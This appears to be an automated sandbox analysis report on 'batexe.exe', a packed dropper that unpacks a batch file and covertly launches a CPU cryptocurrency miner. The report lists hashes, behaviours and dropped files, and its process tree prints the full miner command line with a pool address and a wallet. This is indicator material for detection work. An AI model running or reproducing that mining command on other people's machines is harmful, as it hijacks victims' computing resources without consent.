73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
301s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
12/02/2024, 10:31

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2908	b2e.exe
2260	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2260	cpuminer-sse2.exe
2260	cpuminer-sse2.exe
2260	cpuminer-sse2.exe
2260	cpuminer-sse2.exe
2260	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4528-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4528 wrote to memory of 2908	4528	batexe.exe	74
PID 4528 wrote to memory of 2908	4528	batexe.exe	74
PID 4528 wrote to memory of 2908	4528	batexe.exe	74
PID 2908 wrote to memory of 820	2908	b2e.exe	75
PID 2908 wrote to memory of 820	2908	b2e.exe	75
PID 2908 wrote to memory of 820	2908	b2e.exe	75
PID 820 wrote to memory of 2260	820	cmd.exe	78
PID 820 wrote to memory of 2260	820	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4528
- C:\Users\Admin\AppData\Local\Temp\11CE.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\11CE.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\11CE.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\175B.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:820
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2260

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\11CE.tmp\b2e.exe

Filesize
1.2MB

MD5
e9839ecf391bfcbd254ef2f671d2a76d

SHA1
c92bae68d3836b9e45ec8422945efdba2e5895cb

SHA256
f5c63ec7895a89c244815481d0260e8ba6313340d4a88df8d966874a20ea4db1

SHA512
93317ce659da521d1664284e34f0ccfe0d18cb6525d6e269319fd7f14a4edf6783a539f9d87beae4c1db2eb7dae296555c0569be4b4958616141d40e5036886c

Download Submit
C:\Users\Admin\AppData\Local\Temp\11CE.tmp\b2e.exe

Filesize
1.4MB

MD5
4fb14006f91da9b9d192a28dc0c27645

SHA1
837f9b61d55c7edc89f45a1058098cd33fc0cf29

SHA256
600cebb88fec2f1392e5f2df744b7229ff9e0ef945d2588ee64458864e5ddbe6

SHA512
478f13d23d5f7080d1ebb4ab15c2c56ab0fa708926f2f8260ddffaf7032278bbfa467c6243b26e04814a3857eba9e6ca20424fbc8d92e374534fa0bda60c52a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\175B.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
803KB

MD5
218f243100858b23bb137a0cce556e84

SHA1
96228506abd7989077d1bb40ab9cda68f6a6b5da

SHA256
ead9d909f6d2aac8c94fb05896794deaa55047c585d3923dd029913c6eba5f0c

SHA512
d103e131841f11ba1dc5c43dfb88d395c4da333c1c8f9c1925c82ad02b821d378967227153834d7095a6c1f3ca4ae738f61459b8e3fb6868ed8e59b5b2989470

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
627KB

MD5
c347e2e1f9f123334df3c7a7a774691d

SHA1
b0299651980d5a3c79461e101788ea5f61009e61

SHA256
13bc17f1f917ceb1873930d387241cfbb49677b9677cdddb0dc35f21c9099ce7

SHA512
d77ea7306cdc9706e6040280189669648c1838547344a1a90da4f0d2126d227527936509307e40c81443980bd29a7daec75a8d10c44c7efbe675418cfcf44c0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
556KB

MD5
85037b67bdf423ed813f804420de032a

SHA1
0d42c6b84326f23865e105ba91dede1498c2dfa2

SHA256
4a582deffc205257c026f0c59180af29309cd2bc67b3f3f2e4ab5acf04d984e0

SHA512
79e3f7d7fc712f0a3fae103a25e0611abc12cdc29294b4c23c3cc620c7ac3d85e17ab0ad3e9426fdd51b3f3eb488a59a53cb7fc5ccf440b0358feb8fc0d8bfcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1009KB

MD5
a48e205ba835b54e65ae4f46df906fd4

SHA1
6294078c2fed1720f8d633ad9747bd7c32742565

SHA256
07eeffa99368721356252c1222499ca1088e05d2eeaba1480794ac4a15ad68b1

SHA512
962b111f20b9285e6ff1031b0defc68efe40ebb7e8d2cf70f3aaab79638437863205d401eb6b549a56c897b65fcf3034c766ce9cd75f1d5e60777dbaf7a7c152

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
632KB

MD5
59a739e3fb1ff1d246bc5ea7052dd66d

SHA1
f13282e01ef236082efae086da8f0edb191819f4

SHA256
00d1dbfae550139f685a41bc7bbdd624d85d9be21bbeb7fe811afaccae475e57

SHA512
85e88fd0f58edfba8a7e446dec1b16516798a0e9ef42cf6b9cec5ce4d0036db6666eeccff63186ba5f9d5953830d07a29e0785e1c376a2502e02517f42f57a70

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
754KB

MD5
41bc9fb0254b4440a121ecd9528a7f5b

SHA1
62c1842b8023a7afffe6f0486a83b02cb17f9820

SHA256
9a280cee4b405eb4c7dc4887a3dc3911b3d71f2065ed505512900343a4e28db0

SHA512
23293bed93836247e70aba820d454250c805fe5991432c17d0ecd3192d7f90696da7eefc780771ba72d4e6f61e6512da0fd6d0a5d1e201eb2a622edb81fd195f

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
961KB

MD5
fe5aa162957d3a59825189e48229a3d2

SHA1
819f3195c984563e9781cbb7e2e34ffa298210e5

SHA256
41bdbfcf7c2bb741bb5dbc73ae664ad875b3dbaf9376a8d171026c8b2253b2c1

SHA512
0d70db42ee1d395e376c7bec044830c50d6990bea1077500f402d8279f45dc08eb107d875082566a149d14f487d8f5e392683a1fbd4520bcda7be7eee0fa0bcc

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
226KB

MD5
32ad194726b8c0386796c85cb9e96c68

SHA1
22b904686d1283b46883110ff738b5ee24805852

SHA256
578f15a008b9194c18416a9fe2f766475fa643319a2371e9c40f37eebc80c30d

SHA512
e19b498e2aa71be7c9031b2d27b92b68f5667771a600cd2cba7a9dd4d90183df0ed50d8f890b77b17dc27acf696863fc7b969afc3c7a2f00feaf94c32edf472b

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
225KB

MD5
b5acabb171a1b554097bbc3fd0c07636

SHA1
ad1e49ba0a6f7f989b867cefdaa99cad1028e483

SHA256
855dc0bd8accfd4f76fc9a1bfcbbf07fc02d87da0e1e14f9f0fac119ef0a7885

SHA512
edf662e40276bef09d509213b7706b7962da56f99c91ebd29ccbe0efb4b9072a13357b77cab95fd7613b1e85b214d13341062718876bfe5d7d761eeee135d3e1

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2260-44-0x0000000001020000-0x00000000028D5000-memory.dmp

Filesize
24.7MB

Download
memory/2260-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2260-43-0x00000000580D0000-0x0000000058168000-memory.dmp

Filesize
608KB

Download
memory/2260-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2260-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2908-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2908-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4528-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download